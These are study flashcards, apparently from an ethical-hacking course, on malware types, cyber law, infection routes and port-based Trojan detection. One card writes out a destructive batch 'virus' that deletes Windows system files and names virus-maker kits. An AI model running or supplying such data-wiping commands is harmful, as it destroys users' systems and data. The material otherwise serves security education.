Chapter 8: Trojans, Viruses, Worms, & Covert Channels Flashcards
Malware
short for malicious SW
a term that covers viruses, worms, Trojans, & logic bombs, adware, & spyware
designed to perform malicious & disruptive actions; any type of SW that performs actions w/ out the consent or knowledge of the system owner & results in disruptive action/s
Covert channels
these channels are unknown, un-monitored pieces of a system that can be exploited to gain access
Malware & the Law (3)
THE COMPUTER FRAUD & ABUSE ACT - addresses federal computer-related offenses
THE PATRIOT ACT - penalties up to 10 years for a 1st offense, 20 years for a 2nd offense; assesses damages to multiple systems over the course of a year to determine if it exceeds $5000
CAN-SPAM ACT - designed to stop spam;
Categories of Malware
VIRUSES - self replicating application that attaches itself to executables; typically user action to initiate infectious activities
WORMS - successor to viruses; entirely self-replicating quickly, do not need action performed by user, can be spread across NWs crashing routers, consuming bandwidth & resources
TROJAN HORSES - provides covert access to a system; looks harmless; goals are similar to worm & virus, but info is transmitted & it is more stealthy
ROOTKITS - hide within the core components of a system, very difficult to detect
SPYWARE - collect & forward info about a system or user’s activities in a stealthy manner; most common is keyloggers
ADWARE - replaces homepages in browsers, places pop-up ads, or installs items on a system to advertise a product or service
Designing a Virus (6)
1) DESIGN - envision & create virus
2) REPLICATION - once deployed, virus spreads through replication
3) LAUNCH - virus carries out task for which it was created
4) DETECTION - virus becomes recognized, antivirus makers investigate
5) INCORPORATION - antivirus makers determine a way to identify the virus & incorporate remediation into their product updates
6) ELIMINATION - users of antivirus products incorporate updates & eliminate virus
Kinds of Viruses (12)
1) SYSTEM/BOOT SECTOR VIRUS - code in MBR (master boot record), boot seq. is altered, can make HD undetected etc
2) MACRO VIRUSES - takes adv. of embedded languages (word, excel, etc) designed to hide in those files & change configurations
3) CLUSTER VIRUSES - alters file-allocation tables causing file entries to point to the virus instead of the real flie
4) STEALTH/TUNNELING VIRUS - uses various mechanisms to evade detection systems
5) ENCRYPTION VIRUSES - reprograms itself to avoid detection
6) CAVITY/FILE-OVERWRITING VIRUSES - hides in host file without changing file’s appearance;
7) SPARSE-INFECTOR VIRUSES - avoid detection by carrying out infectious actions sporadically or on files of certain length or type, etc
8) COMPANION/CAMOUFLAGE VIRUS - enables SW w/ the same name, but different extensions (i.e. if you execute program.exe, the virus may create program.com & execute that instead)
9) LOGIC BOMB - infects until predetermined event or action occurs; separated into two parts, payload & trigger
10) FILE/MULTIPARTITE VIRUS - infects multiple ways using muliple attack vectors
11) SHELL VIRUSES - SW infects the target application & alters it
12) CRYPTOVIRUSES - encrypts certain files; victim is notified to contact virus creator & pay specific amount (ransom)
Hoax
makes user take action, but nothing happens (not really a virus, but just as dangerous)
Creating a virus
Do no execute this code bc it could cause a lot of damage
1) Create a batch file called virus.bat using Notepad
2) Enter the following code:
@echo off
Del c:\windows\ystem*.*
Del c:\windows*.*
3) Save virus.bat
4) From cmd, use bat2com to convert virus.bat into virus.com
Another way is to use JPS Virus Maker/TeraBIT Virus Maker 2.8 SE (Has GUI)
Sheep dip system
used to investigate, analyze & defend against malware; it is a computer specifically configured to analyze files; The computer is stripped down & includes on those services & apps needed to test the SW
Methods of Spyware infection
1) P2P
2) IM
3) IRC - internet relay chat
4) E-mail attachments
5) Physical access
6) Browser defects - don’t update patches
7) Freeware - DLing SW for free from unknown SW
8) Websites
9) SW installs - victim DLs SW, but packaged w/ it is a payload that is silently installed in the BG
What are the two items Trojans rely on?
1) OVERT CHANNELS - communication path or channel used to send info or perform other actions; HTTP and TCP/IP are examples to send info
2) COVERT CHANNEL - path used to transmit info, but does so in a way that is supposed to be impossible or it uses a process in a way that it was not intended to be used
Types of Trojans
1) RATs (REMOTE ACCESS TROJANS) - give attacker remote control over system
2) DATA SENDING - transmitting data captured
3) DESTRUCTIVE - seeks to corrupt, erase, or destroy data on system (could affect hardware too)
4) PROXY - attacker hides behind target’s system doing malicious things to another system
5) FTP - the infected hosts becomes a server hosting all kinds of info
6) SECURITY SW DISABLERS
Detecting Trojans & Viruses
Trojans are used to access through backdoors or covert channels, so a port must be opened to allow this communication.
Port scanning is used to detect them; Tools such as nmap, netstat
Using Netstat
Using TCPview
NETSTAT
Used to detect open ports & listen for connections on the system;
1) cmd: netstat -an
//CON: not real-time
TCPview //an executable file
Tracks port usage in real time
TCP vs UDP when choosing protocol to run open port for access to system
typical choice is TCP port bc it is more robust
UDP is typically used to traverse firewall or security architecture
